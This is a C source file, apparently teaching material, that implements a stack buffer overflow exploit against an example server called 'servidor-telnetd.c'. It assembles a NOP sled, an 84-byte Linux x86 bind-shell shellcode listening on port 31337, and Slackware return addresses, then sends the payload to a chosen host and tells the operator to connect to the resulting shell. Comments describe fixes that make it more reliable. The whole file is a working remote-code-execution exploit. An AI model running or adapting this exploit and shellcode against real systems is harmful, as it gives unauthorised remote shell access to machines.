/* Exploit exemplo para servidor-telnetd.c */
#include <errno.h>
#include <limits.h>      /* INT_MIN / INT_MAX for the option range checks */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h> /* in_addr structure */
#include <arpa/inet.h> /* inet_ntoa() to format IP address */
#include <netdb.h>
#define PORTA 8123 /* default TCP port of the target servidor-telnetd (-p overrides) */
#define OFFSET 0 /* default offset added to the return address (-o overrides) */
#define ALINHA 0 /* default payload alignment in bytes (-a overrides) */
#define ERRO -1 /* error sentinel: socket()/connect() failure value and the exit status */
#define MAX 272 /* payload size in bytes; presumably sized to overflow the server's buffer - confirm against servidor-telnetd.c */
#define RET 0xbfffeef0 /* Slackware 10.1 - virtualinsanity (the default return address) */
#define RET2 0xbffff3f0 /* Slackware 10 - weiddy (the base used when -o is non-zero) */
#define RET3 0xbfffee40 /* $esp as read in gdb with "info registers esp" (not referenced by main() in this file) */
#define RET4 0x41414141 /* "crash-only" address ("AAAA"): can only crash the target, never reach the shellcode (not referenced by main()) */
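/* Linux x86 bind shell on port 31337 (0x7a69, the two bytes after the
 * "\x66\x68" push) - from Metasploit Framework, 84 bytes.
 * The bytes are NUL-free, so main() may measure the code with strlen().
 * The fifth line originally read "\xb0\x6 \xcd\x80": a mangled hex escape
 * that expands to 0x06 0x20, making the array 85 bytes and breaking the
 * socketcall sequence; it is restored to "\xb0\x66\xcd\x80", the same
 * "mov al, 0x66 ; int 0x80" pattern used on the line before it, which also
 * brings the length back to the documented 84 bytes. */
unsigned char x86_lnx_bind[] = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99"
"\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x7a\x69"
"\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89"
"\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52"
"\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02"
"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\xcd\x80";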
/* Resolves host, opens a TCP connection to host:porta and returns the
 * connected socket; prints an error and exits on any failure. */
int cria_conexao(char *host, unsigned int porta);
/* Prints the command-line usage for nomeprograma and exits. */
void uso(char *nomeprograma);
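/* Strict decimal parser for the numeric options: the whole string must be
 * a number and it must fit in an int. Returns 0 on success, -1 otherwise
 * (atoi() silently accepted "12abc" and wrapped on overflow). */
static int le_inteiro(const char *texto, int *valor)
{
    char *fim;
    long v;

    if(texto == NULL || *texto == '\0')
        return -1;
    errno = 0;
    v = strtol(texto, &fim, 10);
    if(*fim != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return -1;
    *valor = (int) v;
    return 0;
}

/* Builds the payload (NOP sled, bind shell, return address) and sends it
 * to the target over TCP.
 *
 * Options: -h host (required), -p port, -o offset added to RET2,
 *          -a alignment (0-3 bytes).
 *
 * Fixes over the original:
 *  - a missing -h left host NULL and gethostbyname(NULL) was called;
 *  - the return-address loop started at strlen(payload), which was 0 for any
 *    alignment > 0 (the first bytes were still NUL), and write() sent
 *    strlen(payload) bytes of a buffer with no terminator, reading past it;
 *  - with alignment a, the last return-address word was stored at
 *    payload[MAX + a - 4 .. MAX + a - 1], i.e. past the array;
 *  - the int store through a char* cast is replaced by memcpy;
 *  - short writes were ignored and the write() result was never checked.
 * Exits with ERRO on any error. */
int main(int argc, char *argv[])
{
    /* 3 spare bytes: with an alignment of 1..3 the final return-address word
       ends at MAX + alinhamento, which the original loop already wrote to. */
    char payload[MAX + 3], *host;
    int sockfd, opcao;
    int offset, alinhamento, porta_opt;
    unsigned int ret, porta;
    size_t shell_len, nop_len, total, i, enviado;

    host = NULL;
    ret = RET;
    offset = OFFSET;
    porta = PORTA;
    alinhamento = ALINHA;

    fprintf(stdout, "Exploit para o exemplo servidor-telnetd.c\n");
    if(argc < 2)
        uso(argv[0]);

    while((opcao = getopt(argc, argv, "h:o:p:a:")) != -1)
    {
        switch(opcao)
        {
            case 'h':
                if(strlen(optarg) > 255)
                {
                    fprintf(stderr, "Tamanho de host invalido.\n");
                    exit(ERRO);
                }
                host = optarg;
                break;
            case 'o':
                if(le_inteiro(optarg, &offset) != 0)
                {
                    fprintf(stderr, "Offset invalido.\n");
                    exit(ERRO);
                }
                break;
            case 'p':
                if(le_inteiro(optarg, &porta_opt) != 0 || porta_opt < 0 || porta_opt > 65535)
                {
                    fprintf(stderr, "Porta invalida.\n");
                    exit(ERRO);
                }
                porta = (unsigned int) porta_opt;
                break;
            case 'a':
                /* only 0..3 make sense for 4-byte words, and 3 is all the
                   spare room the buffer has */
                if(le_inteiro(optarg, &alinhamento) != 0 || alinhamento < 0 || alinhamento > 3)
                {
                    fprintf(stderr, "Alinhamento invalido (0-3).\n");
                    exit(ERRO);
                }
                break;
            default:
                uso(argv[0]);
        }
    }
    if(host == NULL)
    {
        fprintf(stderr, "Host nao informado (-h).\n");
        uso(argv[0]);
    }

    /* A non-zero offset switches the base to RET2 as well; kept as the
       original did it - presumably intentional for the second target, confirm.
       Unsigned arithmetic wraps, so a negative offset subtracts without UB. */
    if(offset != 0)
        ret = RET2 + (unsigned int) offset;

    /* the array comes from a string literal: drop its trailing NUL */
    shell_len = sizeof(x86_lnx_bind) - 1;
    if(shell_len + sizeof(ret) > MAX)
    {
        fprintf(stderr, "Shellcode maior que o payload.\n");
        exit(ERRO);
    }
    nop_len = MAX - shell_len - sizeof(ret);

    /* layout: [alignment pad + NOP sled][shellcode][return-address words]
       The pad is made of NOPs too, so the sled simply starts earlier. */
    memset(payload, 0x90, (size_t) alinhamento + nop_len);
    memcpy(payload + alinhamento + nop_len, x86_lnx_bind, shell_len);
    total = MAX + (size_t) alinhamento;
    /* stored in host byte order like the original int cast - correct when
       the attacking host is little-endian like the x86 target */
    for(i = (size_t) alinhamento + nop_len + shell_len; i + sizeof(ret) <= total; i += sizeof(ret))
        memcpy(payload + i, &ret, sizeof(ret));

    fprintf(stdout, "Usando 0x%x como endereco de retorno.\n", ret);

    sockfd = cria_conexao(host, porta);
    /* explicit length, resumed on EINTR and on short writes */
    enviado = 0;
    while(enviado < total)
    {
        ssize_t n = write(sockfd, payload + enviado, total - enviado);
        if(n < 0 && errno == EINTR)
            continue;
        if(n <= 0)
        {
            fprintf(stderr, "Erro #%d enviando o payload: %s\n", errno, strerror(errno));
            shutdown(sockfd, SHUT_RDWR);
            close(sockfd);
            exit(ERRO);
        }
        enviado += (size_t) n;
    }
    fprintf(stdout, "Payload enviado! Conecte em %s:31337\n", host);
    shutdown(sockfd, SHUT_RDWR);
    close(sockfd);
    return 0;
}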
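/* Resolves host and opens a TCP connection to host:porta.
 *
 * Returns the connected socket descriptor. On any failure a message is
 * printed and the process exits with ERRO.
 *
 * Fixes over the original: a NULL host (no -h given) is rejected instead of
 * being handed to gethostbyname(); the resolver failure message no longer
 * prints errno, which gethostbyname() does not set; the address family and
 * length of the result are checked before it is copied into sin_addr;
 * h_addr_list[0] is used instead of the non-standard h_addr macro. */
int cria_conexao(char *host, unsigned int porta)
{
    struct sockaddr_in conexao;
    struct hostent *hbn;
    int sockfd;

    if(host == NULL || porta > 65535)
    {
        fprintf(stderr, "Host ou porta invalidos.\n");
        exit(ERRO);
    }

    /* leave the program if the socket cannot be created */
    if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERRO)
    {
        fprintf(stderr, "Erro #%d criando socket principal: %s\n", errno, strerror(errno));
        exit(ERRO);
    }

    /* resolve the host name (or dotted address) */
    if((hbn = gethostbyname(host)) == NULL)
    {
        fprintf(stderr, "Erro gethostbyname(): Impossivel achar %s.\n", host);
        close(sockfd);
        exit(ERRO);
    }
    if(hbn->h_addrtype != AF_INET || hbn->h_addr_list[0] == NULL
       || hbn->h_length != (int) sizeof(conexao.sin_addr))
    {
        fprintf(stderr, "Endereco de %s nao e IPv4.\n", host);
        close(sockfd);
        exit(ERRO);
    }

    /* fill in the destination */
    memset(&conexao, 0, sizeof(conexao));
    conexao.sin_family = AF_INET;
    conexao.sin_port = htons((unsigned short) porta);
    memcpy(&conexao.sin_addr, hbn->h_addr_list[0], sizeof(conexao.sin_addr));

    if(connect(sockfd, (struct sockaddr *) &conexao, sizeof(conexao)) == ERRO)
    {
        fprintf(stderr, "Erro #%d: %s.\n", errno, strerror(errno));
        shutdown(sockfd, SHUT_RDWR);
        close(sockfd);
        exit(ERRO);
    }
    return sockfd;
}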
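/* Prints the command-line usage and exits.
 *
 * nomeprograma: argv[0]; a NULL (argc == 0) falls back to "exploit" instead
 *               of being passed to %s.
 *
 * The -a option, which main() accepts, was missing from the original text.
 * exit(0) is kept because every caller treats uso() as terminal; a non-zero
 * status would be more conventional for the error paths that reach it. */
void uso(char *nomeprograma)
{
    const char *nome = (nomeprograma != NULL) ? nomeprograma : "exploit";

    fprintf(stdout, "Uso: %s -h <host> [-p porta] [-o offset] [-a alinhamento]\n", nome);
    exit(0);
}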